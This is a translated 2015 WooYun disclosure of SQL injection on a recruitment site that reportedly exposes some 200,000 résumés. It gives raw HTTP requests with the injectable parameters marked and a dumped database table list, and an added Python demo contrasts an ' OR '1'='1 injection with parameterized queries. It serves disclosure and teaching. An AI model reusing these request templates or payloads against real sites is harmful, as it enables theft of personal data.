
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0141398

Title: Elevator recruitment site leaks 200,000 résumés (ID numbers, phone numbers, names, addresses)

Related vendor: cncert National Internet Emergency Center

Author: 路人甲

Submitted: 2015-09-17 21:06

Fixed: 2015-11-03 20:02

Published: 2015-11-03 20:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-09-17: Details sent to the vendor; awaiting vendor handling
2015-09-19: cncert National Internet Emergency Center was unable to reach the responsible organization; details disclosed only to the reporting body
2015-09-29: Details disclosed to core white hats and relevant domain experts
2015-10-09: Details disclosed to regular white hats
2015-10-19: Details disclosed to intern white hats
2015-11-03: Details disclosed to the public

Brief description:

If I could see you at four in the afternoon, I would begin to be happy at three.

Detailed description:

POST /ureg.html HTTP/1.1
Host: **.**.**.**
Content-Length: 225
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: PHPSESSID=n57h3nh792epn50v39276beo27
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
areacodecn=&cityid=San%20Francisco&email=sample%40email.tst&mobile=987-65-4329&name=simqotao&provinceid=440000&pwd=1&read=1&repwd=1&sex=1&townid=1&username=simqotao*&usernamecc=3


POST /jobs.html HTTP/1.1
Host: **.**.**.**
Content-Length: 269
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: PHPSESSID=n57h3nh792epn50v39276beo27
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
keys=%e8%be%93%e5%85%a5%e8%81%8c%e4%bd%8d/%e5%85%ac%e5%8f%b8%e5%85%b3%e9%94%ae%e5%ad%97&searchareaid=*&searchareastr=&searchjobid&searchjobstr=


Proof of vulnerability:

Database: cabhr
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| cb_company_reapp | 1794462 |
| `cb_send_mail_15-04-01` | 884852 |
| cb_send_mail | 851893 |
| cb_email_maillist | 716576 |
| system_mail_userlist | 622650 |
| cb_company_viewresume | 510741 |
| cb_pugong_info | 390952 |
| cb_pugong | 390947 |
| cb_rencai_login | 388083 |
| cb_rencai_workexp | 347089 |
| cb_search_job_key | 329070 |
| cb_company_reapp_emailview | 301446 |
| cb_rencai | 216755 |
| cb_rencai_info | 216707 |
| cb_rencai_info_en | 216706 |
| cb_rencai_intent | 202359 |
| cb_rencai_edu | 182110 |
| cb_company_reapp_admin_appsave | 143094 |
| cb_job_basic | 132447 |
| cb_job_info | 132380 |
| system_sendmail_new | 129633 |
| crm_company_follow | 91966 |
| cb_company_login | 88770 |
| cb_user_refresh | 83208 |
| cb_hr_career | 80568 |
| cb_news | 67884 |
| cb_hr | 61797 |
| cb_rencai_wapwork | 50070 |
| system_sendmail | 40522 |
| cb_company | 37147 |
| cb_company_info | 37147 |
| cb_career | 36828 |
| crm_company_lavel | 33606 |
| cb_reg_sendemail | 33528 |
| cb_admin_login | 26960 |
| crm_company_contact | 26782 |
| cb_rencai_contact_change | 25023 |
| cb_rencai_train | 24425 |
| cb_company_login_error | 22938 |
| cb_rencai_contact_feedback | 20902 |
| cb_company_sms | 18370 |
| cb_company_viewcontact | 17080 |
| cb_rencai_colljob | 16824 |
| cb_company_invite_info | 16461 |
| cb_rencai_avoidcorp | 14888 |
| crm_company_remind | 14033 |
| crm_company_chang | 14015 |
| cb_company_flagchange | 12451 |
| cb_rencai_sex | 11337 |
| cb_search_rencai_key | 11139 |
| crm_company | 9920 |
| cb_company_downresume | 9392 |
| cb_company_collrencai | 7436 |
| crm_getcorp | 7263 |
| cb_send_mail_urgent | 6833 |
| cb_salary_new | 6555 |
| crm_company_give | 5782 |
| x_dt_job | 5179 |
| cb_rencai_sendmail | 5084 |
| cb_company_search_history | 4611 |
| cb_company_contact_change | 4251 |
| cb_rencai_sendmail_feekback | 3726 |
| cb_area | 3399 |
| get_jobs | 3005 |
| cb_company_img | 2818 |
| cb_company_dep | 2430 |
| x_link_job | 2277 |
| get_jobs_havecorp | 2184 |
| cb_sys_reccorp | 2141 |
| cb_rencai_downresume | 1908 |
| cb_wk_info | 1827 |
| crm_getcorp2 | 1575 |
| cb_pugong_corpview | 1372 |
| cb_salary_survey | 1361 |
| cb_company_logo | 1301 |
| cb_department_sell_change | 1254 |
| cb_rencai_sendsms_feekback | 1090 |
| cb_hr_word | 1024 |
| cb_company_upgrade | 933 |
| cb_problem | 884 |
| cb_company_level_reapp | 771 |
| cb_send_mail_reg | 770 |
| cb_company_limit | 764 |
| x_dt_company | 743 |
| crm_company_open | 732 |
| cb_user_changpwd | 705 |
| cb_company_renewal | 683 |
| crm_my_lavel | 473 |
| x_link_company | 430 |
| cb_send_mail_syssend | 424 |
| crm_company_fapiao | 410 |
| cb_rencai_workexp_en | 399 |
| crm_sell_corpperators | 354 |
| cb_rencai_intent_en | 287 |
| cb_adv | 276 |
| cb_links | 272 |
| cb_rencai_edu_en | 266 |
| crm_company_return | 264 |
| cb_user_lottery | 244 |
| cb_job_category | 237 |
| get_jobs_havejob | 213 |
| cb_job_headhunt_apply | 202 |
| cb_baike_entry | 181 |
| cb_company_remark | 168 |
| cb_job_templates | 155 |
| cb_pugong_viewcontact | 151 |
| cb_menu | 131 |
| cb_getjl_upinfo | 121 |
| cb_rencai_train_en | 121 |
| cb_replacekey_link | 93 |
| cb_company_setreply | 84 |
| cb_company_search_engine | 73 |
| cb_email_tpl | 68 |
| cb_help | 54 |
| cb_jipin_setcorp | 52 |
| cb_system | 50 |
| cb_yunying_uw | 49 |
| cb_company_category | 44 |
| cb_news_type | 36 |
| cb_adv_notice | 32 |
| cb_getjl_upinfo_sort | 30 |
| system_sendmail_job | 29 |
| cb_company_lavel | 26 |
| cb_send_mail_set | 23 |
| cb_exhibition_upinfo | 18 |
| cb_baike_sort | 16 |
| cb_company_type | 15 |
| cb_pugong_corp_logo | 13 |
| cb_wk_type | 12 |
| cb_company_nature | 11 |
| cb_hr_word_sort | 11 |
| crm_get_corpweb | 11 |
| cb_career_type | 7 |
| cb_hr_career_type | 7 |
| cb_hr_type | 7 |
| cb_company_folder | 6 |
| crm_sell_faq | 5 |
| cb_links_type | 4 |
| crm_email_tpl | 4 |
| cb_help_type | 3 |
| cb_job_setupdate | 1 |
| crm_set | 1 |
| dl_resume_zt | 1 |
| system_sendmail_max | 1 |
+--------------------------------+---------+

Suggested fix:

Filter the input.
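The report shows two injectable parameters, `username` on /ureg.html and `searchareaid` on /jobs.html, and recommends filtering. The following is an added example, not code from the report or from the affected site: it uses an in-memory SQLite table (the `resume` table, its columns and the sample rows are constructed for the demo, not taken from the dumped schema) to contrast the injectable string-concatenation pattern with the hardened form, which is allowlist validation for the numeric parameter plus bound query parameters for both.

```python
import re
import sqlite3

# Constructed sample rows standing in for a résumé table; table and
# column names are assumptions for this demo, not the site's real schema.
SAMPLE_ROWS = [
    (1, "simqotao", 440000),
    (2, "alice", 440000),
    (3, "bob", 110000),
]


def make_db():
    """In-memory SQLite stand-in for the MySQL database behind the site."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE resume (id INTEGER, username TEXT, areaid INTEGER)")
    conn.executemany("INSERT INTO resume VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_user_vulnerable(conn, username):
    """The injectable pattern: request input is spliced into the SQL text.
    A quote in the value ends the string literal, so the rest of the value
    becomes SQL and can rewrite the WHERE clause (e.g. into a tautology)."""
    sql = "SELECT id FROM resume WHERE username = '%s'" % username
    return [row[0] for row in conn.execute(sql)]


def lookup_user_safe(conn, username):
    """Hardened: the value travels as a bound parameter, never as SQL text,
    so quotes and keywords inside it are just characters to compare against."""
    sql = "SELECT id FROM resume WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


def parse_area_id(raw):
    """Allowlist validation for a numeric parameter such as searchareaid:
    accept only 1-6 ASCII digits and hand the database an int, not a string.
    Anything else (spaces, quotes, SQL keywords) is rejected before any query."""
    if not re.fullmatch(r"[0-9]{1,6}", raw):
        raise ValueError("searchareaid must be a short decimal number")
    return int(raw)


def jobs_by_area_safe(conn, raw_area):
    """Validated integer bound as a parameter: two independent layers."""
    area = parse_area_id(raw_area)
    sql = "SELECT id FROM resume WHERE areaid = ?"
    return [row[0] for row in conn.execute(sql, (area,))]


if __name__ == "__main__":
    db = make_db()
    print(lookup_user_vulnerable(db, "simqotao"))      # [1]
    print(lookup_user_vulnerable(db, "' OR '1'='1"))   # [1, 2, 3]: whole table
    print(lookup_user_safe(db, "' OR '1'='1"))         # []: treated as a literal
    print(jobs_by_area_safe(db, "440000"))             # [1, 2]
    try:
        jobs_by_area_safe(db, "440000 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```

The validation step matters even with bound parameters: it keeps a numeric field from ever being compared as a string and gives the application a single place to log and reject malformed requests, which is also the signal a WAF rule or access-log monitor would key on.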

Copyright notice: please credit 路人甲@乌云 when reposting


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-19 20:01

Vendor reply:

CNVD has confirmed the reported situation and has notified the site's operating organization through the contact details published on the website.

Latest status:

None yet